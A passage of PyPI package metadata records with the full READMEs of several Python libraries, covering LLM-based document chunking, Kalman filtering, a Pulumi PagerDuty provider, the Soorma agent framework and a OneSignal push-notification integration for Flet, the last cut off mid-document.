] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T06:42:19.737501 | adk_fluent-0.6.0.tar.gz | 903,843 | 4c/de/507017087e836e8a3270d0d2e1e724b31b034dc586bbcd8633b776acb630/adk_fluent-0.6.0.tar.gz | source | sdist | null | false | 8b58eee014fe47c6e6f8df5c37d884be | b8dca56cbca068d45f352769346ba642f74d40f66e9f5dcb93f261b4da687568 | 4cde507017087e836e8a3270d0d2e1e724b31b034dc586bbcd8633b776acb630 | MIT | [
"LICENSE"
] | 233 |
2.4 | ai-chunking-ctk | 0.2.8 | Enterprise-grade context-aware semantic chunking library powered by LLMs. | # 🧠 Smart AI Chunking
**Context-Aware Semantic Chunking for RAG**
Smart AI Chunking is an advanced text-splitting library built for RAG (retrieval-augmented generation) pipelines. Unlike traditional fixed-size chunking, it uses a two-phase **"understand first, then split"** strategy to ensure every chunk carries complete semantics and global context.
---
## ✨ Key Features
- **🧠 Context-Aware**: Before splitting, an AI pass reads the entire document and extracts a narrative outline and a global summary, so every chunk knows where it sits in the full text.
- **🔪 Coordinate Splitting**: Instead of mechanically cutting every N characters, invisible coordinate markers are embedded in the text and the LLM picks the most natural semantic break points.
- **🚀 High Performance**: An asynchronous pipeline runs document scanning, summary generation, and chunk processing concurrently for high throughput.
- **📝 Standardized Output**: Every chunk includes not just the text but also a **title**, a **summary**, and **contextual metadata**.
---
## 📦 Installation
Install directly from PyPI:
```bash
pip install ai-chunking-ctk
```
Or install from source:
```bash
git clone https://github.com/chutiankuo0121/ai-chunking.git
cd ai-chunking
pip install .
```
---
## ⚡ Quick Start
With the high-level API, smart chunking takes only a few lines of code.
```python
import asyncio
import json
from ai_chunking import smart_chunk_file, get_openai_wrapper
my_llm = get_openai_wrapper(
api_key="sk-...",
model="deepseek-ai/deepseek-v3.2",
concurrency=20, # number of concurrent requests
base_url="https://..."
)
async def main():
file_path = "document.md"
print(f"Processing: {file_path}")
async for chunk in smart_chunk_file(
file_path=file_path,
llm_func=my_llm,
target_tokens=3500, # target length (tokens) of each chunk
max_llm_context=256000 # model's maximum context window
):
# Print the full JSON result
print(json.dumps(chunk, indent=2, ensure_ascii=False))
if __name__ == "__main__":
asyncio.run(main())
```
---
## 🛠️ API Reference
### `smart_chunk_file`
This is the library's main entry point.
```python
async def smart_chunk_file(
file_path: str | Path,
llm_func: Callable[[str], Awaitable[str]],
target_tokens: int,
max_llm_context: int
) -> AsyncGenerator[Dict, None]
```
#### Parameters
- **`file_path`**: Path to the target Markdown or text file.
- **`llm_func`**: A user-supplied asynchronous LLM call. Takes a `prompt` (str) and returns the `response` (str).
- **`target_tokens`**: **(required)** Desired token count per chunk (e.g. 2000-4000). A good rule of thumb is 1/3 to 1/10 of the model's context window.
- **`max_llm_context`**: **(required)** The LLM's maximum context window (e.g. 128000). The scanner uses this value to tune its stride automatically.
#### Return Value
An async generator that yields dictionaries of the following shape:
```json
{
"chunk_id": "ck_001",
"title": "Introduction to AI Chunking",
"summary": "This section introduces the concept of semantic chunking...",
"content": "Full text content of this chunk...",
"tokens": 850
}
```
---
## ⚙️ How It Works
1. **Phase 1: Scanner (global pass)**
* The system first performs a fast scan of the entire document.
* It produces a document-wide **Narrative Plan**.
* This gives the later splitting phase a bird's-eye view of the text.
2. **Phase 2: Splitter (coordinate splitting)**
* The text is divided into working windows based on the target token count.
* Coordinate markers such as `[ID: 10]` are inserted within each window.
* Drawing on the Phase 1 plan, the LLM tells the system, for example, "cut at ID 15, because the topic ends here."
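The coordinate idea in Phase 2 can be illustrated in a few lines of plain Python (a simplified sketch of the concept, not the library's internal code): markers are interleaved at fixed intervals so the LLM can answer with a small ID rather than a character offset.

```python
def insert_coordinates(text: str, every: int = 20) -> str:
    """Interleave [ID: n] markers every `every` characters so an LLM
    can name a cut point by ID instead of by character offset."""
    parts = []
    for i, start in enumerate(range(0, len(text), every)):
        parts.append(f"[ID: {i}]{text[start:start + every]}")
    return "".join(parts)

def cut_at(text: str, cut_id: int, every: int = 20) -> tuple[str, str]:
    """Split the original (unmarked) text at the position marker `cut_id` refers to."""
    pos = cut_id * every
    return text[:pos], text[pos:]

doc = "A" * 50
print(insert_coordinates(doc)[:15])   # markers interleaved with the text
head, tail = cut_at(doc, 2)           # suppose the LLM answered "cut at ID 2"
print(len(head), len(tail))  # → 40 10
```

In the real library the interval is derived from the token budget rather than a fixed character count, but the mechanism is the same.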
---
## 📄 License
MIT License
| text/markdown | null | Antigravity <assistant@deepmind.com> | null | null | null | null | [
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Topic :: Scientific/Engineering :: Artificial Intelligence"
] | [] | null | null | >=3.9 | [] | [] | [] | [
"pydantic>=2.0.0",
"tenacity>=8.0.0",
"openai>=1.0.0",
"tiktoken>=0.5.0"
] | [] | [] | [] | [
"Homepage, https://github.com/example/ai-chunking",
"Documentation, https://github.com/example/ai-chunking#readme",
"Source, https://github.com/example/ai-chunking"
] | twine/6.2.0 CPython/3.13.5 | 2026-02-20T06:41:44.081955 | ai_chunking_ctk-0.2.8.tar.gz | 31,020 | f9/e9/f7622062d54d23cdc8420392bbd165089735f2056088d421a842404e5a2b/ai_chunking_ctk-0.2.8.tar.gz | source | sdist | null | false | 43ee7cf88318247a678e8dffd6c5ef6e | c54f9d8dc7d3d93c5290412a24820e3c24248b3a6d33ebbc6a6eb84290043c91 | f9e9f7622062d54d23cdc8420392bbd165089735f2056088d421a842404e5a2b | null | [] | 242 |
2.4 | kalbee | 0.2.0 | A clean, modular Python implementation of Kalman Filters and estimation algorithms. | # kalbee 🐝
<div align="center">
<img src="https://raw.githubusercontent.com/MinLee0210/kalbee/main/docs/kalbee.png" alt="kalbee logo" width="300"/>
</div>
<br>
`kalbee` is a clean, modular Python implementation of Kalman Filters and related estimation algorithms. Designed for simplicity and performance, it provides a standard interface for state estimation in various applications.
## ✨ Features
- **8 Filters**: KF, EKF, UKF, Particle, Ensemble, Information, Alpha-Beta-Gamma, Adaptive KF
- **RTS Smoother**: Rauch-Tung-Striebel backward smoother for post-processing
- **Metrics**: RMSE, NEES, NIS, Log-Likelihood for filter diagnostics
- **Experiment Runner**: Compare filters on synthetic signals with one line
- **AutoFilter Factory**: Switch between filters by name
- **Numerical Stability**: Joseph form covariance updates, symmetry enforcement
- **NumPy/SciPy Integration**: Optimized for numerical computations
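As a quick illustration of one of the diagnostics listed above, RMSE can be computed directly with NumPy from its standard definition (this sketch uses plain NumPy, not kalbee's own `metrics` API):

```python
import numpy as np

def rmse(estimates, truth) -> float:
    """Root-mean-square error between estimated and true trajectories."""
    err = np.asarray(estimates, dtype=float) - np.asarray(truth, dtype=float)
    return float(np.sqrt(np.mean(err ** 2)))

# A perfect estimate gives zero error; a constant offset of 1 gives RMSE 1.
print(rmse([1.0, 2.0, 3.0], [1.0, 2.0, 3.0]))  # → 0.0
print(rmse([2.0, 3.0, 4.0], [1.0, 2.0, 3.0]))  # → 1.0
```

NEES and NIS additionally normalize the error by the filter's own covariance, which is what makes them useful consistency checks rather than just accuracy measures.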
## 🚀 Installation
```bash
pip install kalbee
```
Or from source:
```bash
git clone https://github.com/MinLee0210/kalbee.git
cd kalbee
pip install -e .
```
## 🛠️ Quick Start
### 1. Standard Kalman Filter
```python
import numpy as np
from kalbee import KalmanFilter
state = np.zeros((2, 1)) # [position, velocity]
cov = np.eye(2)
F = np.array([[1, 1], [0, 1]]) # Constant velocity model
Q = np.eye(2) * 0.01
H = np.array([[1, 0]])
R = np.array([[0.1]])
kf = KalmanFilter(state, cov, F, Q, H, R)
kf.predict()
kf.update(np.array([[1.2]]))
print(f"Estimated State:\n{kf.x}")
```
### 2. Compare Filters with Experiments
```python
from kalbee import run_experiment
report = run_experiment(
signal="sine",
filters=["kf", "ekf", "ukf", "pf"],
noise_std=0.5,
)
print(report.summary())
```
### 3. AutoFilter Factory
```python
from kalbee import AutoFilter
kf = AutoFilter.from_filter(state, cov, F, Q, H, R, mode="kf")
# Available modes: kf, ekf, ukf, abg, pf, enkf, if, akf
```
## 📚 Documentation
Full documentation with theory, code examples, and experiments for each filter:
```bash
pip install mkdocs-material
mkdocs serve
```
- [Getting Started](docs/getting_started.md)
- **Filters**: [KF](docs/filters/kalman_filter.md) · [EKF](docs/filters/extended_kalman_filter.md) · [UKF](docs/filters/unscented_kalman_filter.md) · [PF](docs/filters/particle_filter.md) · [EnKF](docs/filters/ensemble_kalman_filter.md) · [IF](docs/filters/information_filter.md) · [ABG](docs/filters/alpha_beta_gamma_filter.md) · [AKF](docs/filters/adaptive_kalman_filter.md)
- **Features**: [RTS Smoother](docs/features/rts_smoother.md) · [Metrics](docs/features/metrics.md) · [Experiments](docs/features/experiments.md)
- [Architecture](docs/architecture.md)
## 🧪 Testing
```bash
uv run pytest tests/ # 58 tests
```
## 📄 License
This project is licensed under the Apache License 2.0.
## 🤝 Contributing
Contributions are welcome! Please feel free to submit a Pull Request. Check `TODO.md` for ideas.
| text/markdown | null | Le Duc Minh <minh.leduc.0210@gmail.com> | null | Le Duc Minh <minh.leduc.0210@gmail.com> | null | kalman-filter, extended-kalman-filter, ekf, unscented-kalman-filter, ukf, particle-filter, ensemble-kalman-filter, information-filter, state-estimation, sensor-fusion, tracking, alpha-beta-gamma, rts-smoother, adaptive-filter, robotics, signal-processing, python | [] | [] | null | null | >=3.8 | [] | [] | [] | [
"numpy>=1.24.4",
"scipy>=1.10.0",
"pytest>=8.3.5",
"ruff>=0.14.13",
"scikit-learn>=1.3.2"
] | [] | [] | [] | [
"Homepage, https://github.com/MinLee0210/kalbee",
"Repository, https://github.com/MinLee0210/kalbee",
"Documentation, https://minlee0210.github.io/kalbee"
] | twine/6.2.0 CPython/3.10.19 | 2026-02-20T06:40:46.623160 | kalbee-0.2.0.tar.gz | 30,478 | a3/c8/09c2168abace57d7130ece4924ce96b96a7d38ab21f8d89d8211ec133594/kalbee-0.2.0.tar.gz | source | sdist | null | false | 52dc70f808696b1b163cd0c312617d35 | 338f81d6349e87b73cd0393f9a2d4171315738d47b0d3f5fbc13bf3e177b1702 | a3c809c2168abace57d7130ece4924ce96b96a7d38ab21f8d89d8211ec133594 | null | [
"LICENSE"
] | 245 |
2.4 | pulumi-pagerduty | 4.31.0a1771569073 | A Pulumi package for creating and managing pagerduty cloud resources. | [](https://github.com/pulumi/pulumi-pagerduty/actions)
[](https://slack.pulumi.com)
[](https://www.npmjs.com/package/@pulumi/pagerduty)
[](https://pypi.org/project/pulumi-pagerduty)
[](https://badge.fury.io/nu/pulumi.pagerduty)
[](https://pkg.go.dev/github.com/pulumi/pulumi-pagerduty/sdk/v2/go)
[](https://github.com/pulumi/pulumi-pagerduty/blob/master/LICENSE)
# PagerDuty Resource Provider
The PagerDuty Resource Provider lets you manage PagerDuty resources.
## Installing
This package is available in many languages in the standard packaging formats.
### Node.js (JavaScript/TypeScript)
To use from JavaScript or TypeScript in Node.js, install using either `npm`:
```bash
npm install @pulumi/pagerduty
```
or `yarn`:
```bash
yarn add @pulumi/pagerduty
```
### Python
To use from Python, install using `pip`:
```bash
pip install pulumi_pagerduty
```
### Go
To use from Go, use `go get` to grab the latest version of the library:
```bash
go get github.com/pulumi/pulumi-pagerduty/sdk/v4
```
### .NET
To use from .NET, install using `dotnet add package`:
```bash
dotnet add package Pulumi.Pagerduty
```
## Configuration
The following configuration points are available:
- `pagerduty:token` - (Required) The v2 authorization token. It can also be sourced from the `PAGERDUTY_TOKEN`
environment variable. See [API Documentation](https://v2.developer.pagerduty.com/docs/authentication) for more information.
- `pagerduty:skipCredentialsValidation` - (Optional) Skip validation of the token against the PagerDuty API.
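For instance, with the standard Pulumi CLI the token can be stored as an encrypted stack secret, or supplied via the environment instead:

```bash
# Store the token as an encrypted secret in the current stack's config
# (the CLI prompts for the value so it never appears in shell history)
pulumi config set pagerduty:token --secret

# Or source it from the environment instead
export PAGERDUTY_TOKEN="<your-v2-api-token>"
```

Either mechanism keeps the token out of source control; the provider reads the config key first and falls back to the environment variable.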
## Reference
For further information, please visit [the PagerDuty provider docs](https://www.pulumi.com/docs/intro/cloud-providers/pagerduty)
or for detailed reference documentation, please visit [the API docs](https://www.pulumi.com/docs/reference/pkg/pagerduty).
| text/markdown | null | null | null | null | Apache-2.0 | pulumi, pagerduty | [] | [] | null | null | >=3.9 | [] | [] | [] | [
"parver>=0.2.1",
"pulumi<4.0.0,>=3.165.0",
"semver>=2.8.1",
"typing-extensions<5,>=4.11; python_version < \"3.11\""
] | [] | [] | [] | [
"Homepage, https://pulumi.io",
"Repository, https://github.com/pulumi/pulumi-pagerduty"
] | twine/6.2.0 CPython/3.11.8 | 2026-02-20T06:40:31.712019 | pulumi_pagerduty-4.31.0a1771569073.tar.gz | 212,270 | e6/0a/a87dd95c025c5311625a5c86df6d59ed53421ece1912722dd964e2ee330f/pulumi_pagerduty-4.31.0a1771569073.tar.gz | source | sdist | null | false | d2049b37a97935fbf46f6077f94fa054 | 50265a8eeab2a2769856e69748ad0f4db225e9f2f84ff64491514f5668f8e62a | e60aa87dd95c025c5311625a5c86df6d59ed53421ece1912722dd964e2ee330f | null | [] | 199 |
2.4 | soorma-core | 0.7.7 | The Open Source Foundation for AI Agents. Powered by the DisCo (Distributed Cognition) architecture. | # Soorma Core SDK
**The Open Source Foundation for AI Agents.**
Soorma is an agentic infrastructure platform based on the **DisCo (Distributed Cognition)** architecture. It provides a standardized **Control Plane** (Registry, Event Bus, Memory Service) for building production-grade multi-agent systems.
[](https://pypi.org/project/soorma-core/)
[](https://www.python.org/downloads/)
[](https://opensource.org/licenses/MIT)
## 🚧 Status: Day 0 (Pre-Alpha)
We're in active pre-launch refactoring to solidify architecture and APIs before v1.0. The SDK and infrastructure are functional for building multi-agent systems.
**Learn more:** [soorma.ai](https://soorma.ai)
## Installation
> **During Pre-Launch:** We recommend installing from local source to stay synchronized with breaking changes:
```bash
# Clone the repository
git clone https://github.com/soorma-ai/soorma-core.git
cd soorma-core
# Install from source
pip install -e sdk/python
```
> **After v1.0 Release:** Standard PyPI installation will be recommended: `pip install soorma-core`
**Requirements:** Python 3.11+
## Quick Start
> **Note:** Infrastructure runs locally via Docker. Clone the repo to get started.
```bash
# 1. Clone the repository
git clone https://github.com/soorma-ai/soorma-core.git
cd soorma-core
# 2. Start local infrastructure
soorma dev --build
# 3. Run the Hello World example
cd examples/01-hello-world
python worker.py
# 4. In another terminal, send a request
python client.py Alice
```
**Next steps:** See the [Examples Guide](https://github.com/soorma-ai/soorma-core/blob/main/examples/README.md) for a complete learning path.
## Core Concepts
Soorma provides three agent types for building distributed AI systems:
- **Tool** - Synchronous, stateless operations (< 1 second)
- **Worker** - Asynchronous, stateful tasks with delegation
- **Planner** - Strategic reasoning and goal decomposition (Stage 4)
**Platform Services:**
- `context.registry` - Service discovery
- `context.memory` - Distributed state (Semantic, Episodic, Working memory)
- `context.bus` - Event choreography
- `context.tracker` - Observability
**Learn more:** See the [comprehensive documentation](https://github.com/soorma-ai/soorma-core) for architecture details, patterns, and API references.
## Agent Models
### Tool Model (Synchronous)
Tools handle fast, stateless operations that return immediate results:
```python
from soorma import Tool
from soorma.agents.tool import InvocationContext
tool = Tool(name="calculator")
@tool.on_invoke("calculate.add")
async def add_numbers(request: InvocationContext, context):
numbers = request.data["numbers"]
return {"sum": sum(numbers)} # Auto-published to caller
```
**Characteristics:**
- ⚡ **Stateless:** No persistence between calls
- 🚀 **Fast:** Returns immediately (< 1 second)
- 🔄 **Auto-complete:** SDK publishes response automatically
- 📊 **Use cases:** Calculations, lookups, validations
**Example:** [01-hello-tool](https://github.com/soorma-ai/soorma-core/tree/main/examples/01-hello-tool)
### Worker Model (Asynchronous with Delegation)
Workers handle multi-step, stateful tasks with delegation:
```python
from soorma import Worker
from soorma.task_context import TaskContext, ResultContext
worker = Worker(name="order-processor")
@worker.on_task("order.process.requested")
async def process_order(task: TaskContext, context):
# Save state
task.state["order_id"] = task.data["order_id"]
await task.save()
# Delegate to sub-workers
await task.delegate_parallel([
DelegationSpec("inventory.reserve.requested", {...}, "inventory.reserved"),
DelegationSpec("payment.process.requested", {...}, "payment.processed"),
])
@worker.on_result("inventory.reserved")
@worker.on_result("payment.processed")
async def handle_result(result: ResultContext, context):
task = await result.restore_task()
task.update_sub_task_result(result.correlation_id, result.data)
# Complete once all results have arrived
if task.aggregate_parallel_results(task.state["group_id"]):
await task.complete({"status": "completed"})
```
**Characteristics:**
- 💾 **Stateful:** TaskContext persists across delegations
- 🔄 **Asynchronous:** Manual completion with `task.complete()`
- 🎯 **Delegation:** Sequential or parallel sub-tasks
- ⚙️ **Use cases:** Workflows, long-running operations, coordination
**Delegation Patterns:**
- **Sequential:** `task.delegate()` - One sub-task at a time
- **Parallel:** `task.delegate_parallel()` - Fan-out with aggregation
- **Multi-level:** Workers can delegate to Workers (arbitrary depth)
**Example:** [08-worker-basic](https://github.com/soorma-ai/soorma-core/tree/main/examples/08-worker-basic)
### Comparison
| Feature | Tool | Worker |
|---------|------|--------|
| Execution | Synchronous | Asynchronous |
| State | Stateless | Stateful (TaskContext) |
| Completion | Auto | Manual (`task.complete()`) |
| Delegation | ❌ No | ✅ Yes |
| Memory I/O | ❌ No | ✅ Yes |
| Latency | < 100ms | Seconds to minutes |
| Example | Calculator | Order processing |
## CLI Reference
| Command | Description |
|---------|-------------|
| `soorma init <name>` | Create a new agent project |
| `soorma dev` | Start local infrastructure |
| `soorma dev --build` | Build and start (first time) |
| `soorma dev --status` | Show infrastructure status |
| `soorma dev --logs` | View infrastructure logs |
| `soorma dev --stop` | Stop infrastructure |
| `soorma dev --stop --clean` | Stop and remove all data |
| `soorma version` | Show SDK version |
The `soorma dev` command runs infrastructure (Registry, NATS, Event Service, Memory Service) in Docker while your agent code runs natively on the host for fast iteration and debugging.
## Documentation & Resources
**📚 Complete Documentation:** [github.com/soorma-ai/soorma-core](https://github.com/soorma-ai/soorma-core)
**Key Guides:**
- [Examples Guide](https://github.com/soorma-ai/soorma-core/blob/main/examples/README.md) - Progressive learning path from hello-world to advanced patterns
- [Developer Guide](https://github.com/soorma-ai/soorma-core/blob/main/docs/DEVELOPER_GUIDE.md) - Development workflows and testing
- [Agent Patterns](https://github.com/soorma-ai/soorma-core/blob/main/docs/agent_patterns/README.md) - Tool, Worker, Planner models and DisCo pattern
- [Event System](https://github.com/soorma-ai/soorma-core/blob/main/docs/event_system/README.md) - Event-driven architecture, topics, messaging
- [Memory System](https://github.com/soorma-ai/soorma-core/blob/main/docs/memory_system/README.md) - CoALA framework and memory types
- [Discovery](https://github.com/soorma-ai/soorma-core/blob/main/docs/discovery/README.md) - Registry and capability discovery
**🎓 Learning Path:**
1. [01-hello-world](https://github.com/soorma-ai/soorma-core/tree/main/examples/01-hello-world) - Basic Worker pattern
2. [02-events-simple](https://github.com/soorma-ai/soorma-core/tree/main/examples/02-events-simple) - Event pub/sub
3. [03-events-structured](https://github.com/soorma-ai/soorma-core/tree/main/examples/03-events-structured) - LLM-based event selection
4. [04-memory-working](https://github.com/soorma-ai/soorma-core/tree/main/examples/04-memory-working) - Workflow state
5. [05-memory-semantic](https://github.com/soorma-ai/soorma-core/tree/main/examples/05-memory-semantic) - RAG patterns
6. [06-memory-episodic](https://github.com/soorma-ai/soorma-core/tree/main/examples/06-memory-episodic) - Multi-agent chatbot
## Contributing & Support
- **Repository:** [github.com/soorma-ai/soorma-core](https://github.com/soorma-ai/soorma-core)
- **Issues:** [Report bugs or request features](https://github.com/soorma-ai/soorma-core/issues)
- **Discussions:** [Ask questions](https://github.com/soorma-ai/soorma-core/discussions)
- **Changelog:** [Release notes](https://github.com/soorma-ai/soorma-core/blob/main/CHANGELOG.md)
## License
MIT License - see [LICENSE](https://github.com/soorma-ai/soorma-core/blob/main/LICENSE) for details.
| text/markdown | Soorma AI | founders@soorma.ai | null | null | MIT | ai, agents, disco, distributed-systems, llm, orchestration | [
"Development Status :: 2 - Pre-Alpha",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13",
"Programming Language :: Python :: 3.14",
"Topic :: Software Development :: Libraries :: Application Frameworks"
] | [] | null | null | <4.0,>=3.11 | [] | [] | [] | [
"httpx>=0.26.0",
"pydantic<3.0.0,>=2.0.0",
"rich>=10.11.0",
"soorma-common>=0.7.0",
"typer>=0.13.0"
] | [] | [] | [] | [
"Homepage, https://soorma.ai",
"Repository, https://github.com/soorma-ai/soorma-core"
] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T06:40:17.743782 | soorma_core-0.7.7.tar.gz | 71,648 | 3a/a9/ed117ef1e13badef01538b2b23b44f26e1c1aa6611c67dd34462d929a5dd/soorma_core-0.7.7.tar.gz | source | sdist | null | false | 6d7f1773773d50b60fc556fe966e8518 | 79a9a59cbcca893d74699aa2c2820224294c22e762e89750dc5eb4f0aa887039 | 3aa9ed117ef1e13badef01538b2b23b44f26e1c1aa6611c67dd34462d929a5dd | null | [
"LICENSE.txt"
] | 226 |
2.4 | flet-onesignal | 0.4.3 | Flutter OneSignal package integration for Python Flet. | <p align="center"><img src="https://github.com/user-attachments/assets/ee3f4caf-10a7-4c58-948d-6a59fda97850" width="300" height="150" alt="Flet OneSignal"></p>
<h1 align="center">Flet OneSignal</h1>
<p align="center">
<strong>OneSignal SDK integration for Flet applications</strong>
</p>
<p align="center">
<a href="https://github.com/brunobrown/flet-onesignal/blob/main/LICENSE" target="_blank">
<img src="https://img.shields.io/badge/license-MIT-green?style=flat" alt="License">
</a>
<a href="https://github.com/brunobrown/flet-onesignal/actions?query=workflow%3AMain+event%3Apush+branch%3Amain" target="_blank">
<img src="https://github.com/brunobrown/flet-onesignal/actions/workflows/main.yml/badge.svg?event=push&branch=main" alt="Main">
</a>
<a href="https://github.com/brunobrown/flet-onesignal/actions?query=workflow%3ADev+event%3Apush+branch%3ADev" target="_blank">
<img src="https://github.com/brunobrown/flet-onesignal/actions/workflows/dev.yml/badge.svg?event=push&branch=dev" alt="Dev">
</a>
<a href="https://pypi.org/project/flet-onesignal" target="_blank">
<img src="https://img.shields.io/pypi/v/flet-onesignal?color=%2334D058&label=pypi%20package" alt="Package version">
</a>
<a href="https://pypi.org/project/flet-onesignal" target="_blank">
<img src="https://img.shields.io/pypi/pyversions/flet-onesignal.svg?color=%2334D058" alt="Supported Python versions">
</a>
<a href="https://pepy.tech/projects/flet-onesignal"><img src="https://static.pepy.tech/personalized-badge/flet-onesignal?period=monthly&units=INTERNATIONAL_SYSTEM&left_color=GREY&right_color=BLUE&left_text=downloads%2Fmonth" alt="PyPI Downloads">
</a>
<a href="https://brunobrown.github.io/flet-onesignal" target="_blank">
<img src="https://img.shields.io/badge/docs-mkdocs-blue" alt="Documentation">
</a>
</p>
---
- [Installation](#installation)
- [Quick Start](#quick-start)
- [API Reference](#api-reference)
## Overview
**Flet OneSignal** is an extension that integrates the [OneSignal Flutter SDK](https://documentation.onesignal.com/docs/en/flutter-sdk-setup) with [Flet](https://flet.dev) applications. It provides a complete Python API for:
- [Push Notifications](#push-notifications) — send and receive on iOS and Android ([OneSignal Docs](https://documentation.onesignal.com/docs/en/push))
- [In-App Messages](#in-app-messages) — targeted messages within your app ([OneSignal Docs](https://documentation.onesignal.com/docs/en/in-app-messages-setup))
- [User Management](#user-management) — identity, tags, aliases, email, SMS ([OneSignal Docs](https://documentation.onesignal.com/docs/en/users))
- [Location](#location) — geo-targeted messaging ([OneSignal Docs](https://documentation.onesignal.com/docs/en/location-opt-in-prompt))
- [Outcomes](#outcomes) — track actions and conversions ([OneSignal Docs](https://documentation.onesignal.com/docs/en/custom-outcomes))
- [Live Activities](#live-activities-ios) — iOS real-time updates (iOS 16.1+) ([OneSignal Docs](https://documentation.onesignal.com/docs/en/live-activities))
- [Privacy & Consent](#privacy--consent) — GDPR compliance ([OneSignal Docs](https://documentation.onesignal.com/docs/en/handling-personal-data))
- [Debugging](#debugging) — log levels and error handling
> **Version 0.4.0** - Built for Flet 0.80.x with a modular architecture that mirrors the OneSignal SDK structure.
---
## Buy Me a Coffee
If you find this project useful, please consider supporting its development:
<a href="https://www.buymeacoffee.com/brunobrown">
<img src="https://www.buymeacoffee.com/assets/img/guidelines/download-assets-sm-1.svg" width="200" alt="Buy Me a Coffee">
</a>
---
## Requirements
| Component | Minimum Version |
|-----------|-----------------|
| Python | 3.10+ |
| Flet | 0.80.x+ |
### Platform Requirements
| Platform | Minimum Version | Notes |
|----------|-----------------|-------|
| **iOS** | 12.0+ | Requires Xcode 14+ |
| **Android** | API 24 (Android 7.0)+ | Requires `compileSdkVersion 33+` |
---
## Installation
### Step 1: Install the Package
Choose your preferred package manager:
```bash
# Using UV (Recommended)
uv add flet-onesignal
# Using pip
pip install flet-onesignal
# Using Poetry
poetry add flet-onesignal
```
### Step 2: Configure pyproject.toml
Add the dependency to your project configuration:
```toml
[project]
name = "my-flet-app"
version = "1.0.0"
requires-python = ">=3.10"
dependencies = [
"flet>=0.80.5",
"flet-onesignal>=0.4.0",
]
[tool.flet.app]
path = "src"
```
### Step 3: OneSignal Dashboard Setup (Android)
1. Create an account at [OneSignal.com](https://onesignal.com), then click **+ Create** > **New App**.
2. Enter your **App Name**, select the organization, choose **Google Android (FCM)** as the channel, and click **Next: Configure Your Platform**.

3. Upload your **Service Account JSON** file. To generate it, go to the [Firebase Console](https://console.firebase.google.com) > **Project Settings** > **Service accounts** > **Generate new private key**. See the [OneSignal Android credentials guide](https://documentation.onesignal.com/docs/en/android-firebase-credentials) for detailed instructions. Click **Save & Continue**.

4. Select **Flutter** as the target SDK, then click **Save & Continue**.

5. Copy the **App ID** displayed on the screen and click **Done**. You will use this ID in your Flet app.

### Step 4: iOS Configuration
1. Enable **Push Notifications** capability in Xcode
2. Enable **Background Modes** > Remote notifications
3. Add your APNs certificate to the OneSignal dashboard
---
## Quick Start
```python
import flet as ft
import flet_onesignal as fos
# Your OneSignal App ID from the dashboard
ONESIGNAL_APP_ID = "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx"
async def main(page: ft.Page):
page.title = "My App"
# Initialize OneSignal
onesignal = fos.OneSignal(
app_id=ONESIGNAL_APP_ID,
log_level=fos.OSLogLevel.DEBUG, # Enable debug logging
)
# Add to page services (required for Flet 0.80.x services)
page.services.append(onesignal)
# Request notification permission
permission_granted = await onesignal.notifications.request_permission()
print(f"Notification permission: {permission_granted}")
# Identify the user (optional but recommended)
await onesignal.login("user_12345")
page.add(ft.Text("OneSignal is ready!"))
if __name__ == "__main__":
ft.run(main)
```
> **Note:** `OneSignal` is a **service**, not a visual control. You must add it using `page.services.append(onesignal)` — **not** `page.overlay.append(onesignal)`. Using `overlay` will not initialize the SDK correctly.
---
## Architecture
The SDK follows a modular architecture that mirrors the official OneSignal SDK:
```
fos.OneSignal
│
├── .debug # Logging and debugging
├── .user # User identity, tags, aliases, email, SMS
├── .notifications # Push notification management
├── .in_app_messages # In-app message triggers and lifecycle
├── .location # Location sharing (optional)
├── .session # Outcomes and analytics
└── .live_activities # iOS Live Activities (iOS 16.1+)
```
Each module provides focused functionality and can be accessed as a property of the main `OneSignal` instance.
---
## User Management
### Login and Logout
Associate users with their account in your system using an **External User ID**:
```python
# Login - Associates the device with your user ID
await onesignal.login("user_12345")
# Logout - Removes the association, creates anonymous user
await onesignal.logout()
```
> **Best Practice:** Call `login()` when the user signs into your app and `logout()` when they sign out.
### Get User IDs
```python
# Get the OneSignal-generated user ID
onesignal_id = await onesignal.user.get_onesignal_id()
print(f"OneSignal ID: {onesignal_id}")
# Get the External User ID (set via login)
external_id = await onesignal.user.get_external_id()
print(f"External ID: {external_id}")
```
### Tags
Tags are key-value pairs used for segmentation and personalization:
```python
# Add a single tag
await onesignal.user.add_tag("subscription_type", "premium")
# Add multiple tags at once
await onesignal.user.add_tags({
    "favorite_team": "barcelona",
    "notification_frequency": "daily",
    "app_version": "2.1.0",
})
# Remove a tag
await onesignal.user.remove_tag("old_tag")
# Remove multiple tags
await onesignal.user.remove_tags(["tag1", "tag2", "tag3"])
# Get all tags
tags = await onesignal.user.get_tags()
print(f"User tags: {tags}")
```
### Aliases
Aliases allow you to associate multiple identifiers with a single user:
```python
# Add an alias (e.g., CRM ID, database ID)
await onesignal.user.add_alias("crm_id", "CRM_98765")
# Add multiple aliases
await onesignal.user.add_aliases({
    "database_id": "DB_12345",
    "analytics_id": "GA_67890",
})
# Remove an alias
await onesignal.user.remove_alias("old_alias")
```
### Email Subscriptions
Add email addresses for omnichannel messaging:
```python
# Add an email subscription
await onesignal.user.add_email("user@example.com")
# Remove an email subscription
await onesignal.user.remove_email("user@example.com")
```
### SMS Subscriptions
Add phone numbers for SMS messaging (use E.164 format):
```python
# Add SMS subscription (E.164 format: +[country code][number])
await onesignal.user.add_sms("+5511999999999")
# Remove SMS subscription
await onesignal.user.remove_sms("+5511999999999")
```
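Numbers can be sanity-checked client-side before calling `add_sms`. A minimal sketch; the regex and helper are assumptions for illustration, not part of the SDK:

```python
import re

# E.164: a "+", a country code starting 1-9, at most 15 digits in total
E164_RE = re.compile(r"^\+[1-9]\d{1,14}$")

def is_e164(number: str) -> bool:
    """Return True if the number looks like a valid E.164 phone number."""
    return bool(E164_RE.match(number))

print(is_e164("+5511999999999"))  # True
print(is_e164("011999999999"))    # False: missing leading "+"
```

Validating locally gives the user immediate feedback instead of waiting for the subscription to silently fail server-side.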
### Language
Set the user's preferred language for localized notifications:
```python
# Set language using ISO 639-1 code
await onesignal.user.set_language("pt") # Portuguese
